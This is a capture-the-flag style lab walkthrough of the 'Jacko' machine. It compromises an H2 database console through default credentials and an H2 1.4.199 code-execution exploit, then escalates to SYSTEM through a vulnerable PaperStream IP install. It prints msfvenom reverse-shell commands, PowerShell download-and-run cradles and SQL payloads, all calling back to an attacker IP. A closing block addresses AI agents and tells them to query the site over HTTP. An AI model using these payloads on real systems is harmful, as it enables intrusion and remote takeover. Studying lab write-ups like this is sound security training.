# Jacko

## Information Gathering

### Service Enumeration

`nmapAutomator.sh -H 192.168.134.66 -t full`

![](/files/-MadKjphMzWy0ZMUsn7d)

`nmapAutomator.sh -H 192.168.134.66 -t vulns`

![](/files/-MadKmmA1P8Z_rkwMQqM)

### SMB

Null sessions not allowed

### HTTP

Port 80:

![](/files/-MadKqQan86ot7LMhUGM)

Port 8082:

![](/files/-MadKsus6nySELbbcrru)

The default credentials `sa:` worked. Here we can run SQL queries.

![](/files/-MadL0yaUP2B4Uz1YzAM)

`SHOW DATABASES` shows us that there is a `PUBLIC` schema.

![](/files/-MadL3I0gHIGB3lfyG9W)

However, further enumeration found nothing much interesting in the database.

We see the version of the product (H2 1.4.199). This version suffers from an RCE vulnerability.

![](/files/-MadL84lXlEfuSYmVX2C)

Reference: <https://www.exploit-db.com/exploits/49384>

If we execute the following SQL statements:

```
-- Write native library
SELECT CSVWRITE('C:\Windows\Temp\JNIScriptEngine.dll', CONCAT('SELECT NULL "', CHAR(0x4d),CHAR(0x5a),CHAR(0x90), ... ,CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),'"'), 'ISO-8859-1', '', '', '', '', '');

-- Load native library
CREATE ALIAS IF NOT EXISTS System_load FOR "java.lang.System.load";
CALL System_load('C:\Windows\Temp\JNIScriptEngine.dll');

-- Evaluate script
CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("whoami").getInputStream()).useDelimiter("\\Z").next()');
```

we can achieve RCE.

With this, we can run the `systeminfo` command. This shows us that the architecture is x64.

![](/files/-MadLHgqcFfd9WEVwFnm)

`msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.49.103 LPORT=445 -f exe > reverse.exe`

**Note that ports like 4242, 4444, etc. did not work. I used port 445 since I realised that I was able to copy files via SMB, so it likely won't be blocked by the firewall.**

Copy the payload to the victim machine via SMB:

```sql
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("cmd.exe /c copy \\\\192.168.49.103\\ROPNOP\\reverse.exe c:\\users\\tony\\reverse.exe").getInputStream()).useDelimiter("\\Z").next()');
```

![](/files/-MadLiB3Fz5OLMrA0UZ7)

Running the payload:

```sql
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("c:\\users\\tony\\reverse.exe").getInputStream()).useDelimiter("\\Z").next()');
```

Receiving the reverse shell:

![](/files/-MadLlEKhAngTrIl5fk4)

![](/files/-MadLsVnwxfX6zI2p8fb)

### Privilege Escalation

#### SeImpersonatePrivilege

`c:\windows\system32\whoami.exe /priv`

We see that `SeImpersonatePrivilege` is enabled.

![](/files/-MadM7ALl_Dlkhw072iJ)

After we locate the location of `powershell.exe`, we can run powershell.

![](/files/-MadMBqzx3IqcXVjRVR7)

Using the `GetCLSID.ps1` script from <http://ohpe.it/juicy-potato/CLSID/>, we can attempt to get CLSIDs.

`IEX (New-Object Net.WebClient).DownloadString('http://192.168.49.103/GetCLSID.ps1')`

![](/files/-MadMG_DfmTFwDBpwiLX)

This does not work because we cannot find any CLSIDs.

#### Windows OS Exploits

Transfer WinPEAS:

`$WebClient = New-Object System.Net.WebClient; $WebClient.DownloadFile("http://192.168.49.103/winPEASx86.exe","C:\users\tony\winPEASx86.exe")`

Run WinPEAS:

`c:\users\tony\winpeasx86.exe`

![](/files/-MadMTeUzb5ooeoP0eJC)

We could try these as a last resort.

#### Vulnerable Apps

**Took quite a while to figure this out. Always check for vulnerable apps if WinPEAS does not find anything useful!**

![](/files/-MadMaol4VyzXTH5MbHw)

![](/files/-MadMede9MTxuOf9ltr3)

We can check the PaperStream IP version, it is 1.42

![](/files/-MadMs6oo7UN108K3X8k)

This version is vulnerable to a privilege escalation vulnerability.

PaperStream IP exploit: <https://www.exploit-db.com/exploits/49382>

`msfvenom -p windows/shell_reverse_tcp -f dll -o shell.dll LHOST=192.168.49.103 LPORT=445`

![](/files/-MadNCpAc_wF4rEqlufv)

**I initially made the mistake of using an `x64` payload. Note that the application is found under `Program Files (x86)`, so it cannot use an `x64` DLL.**

`$WebClient = New-Object System.Net.WebClient; $WebClient.DownloadFile("http://192.168.49.103/shell.dll","C:\users\tony\shell.dll")`

`$WebClient = New-Object System.Net.WebClient; $WebClient.DownloadFile("http://192.168.49.103/49382.ps1","C:\users\tony\49382.ps1")`

Run the exploit: `C:\users\tony\49382.ps1`

![](/files/-MadNSPX9P7JYNIRSZmU)

Once the exploit is triggered, we obtain our reverse shell.

![](/files/-MadNao1ag55biQHa96D)

The exploit works and we received a SYSTEM shell.

![](/files/-MadNdgNQlbeeP9MyDKh)

![](/files/-MadNgOkswCDuFDsCyE8)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://pentesting.zeyu2001.com/proving-grounds/get-to-work/jacko.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.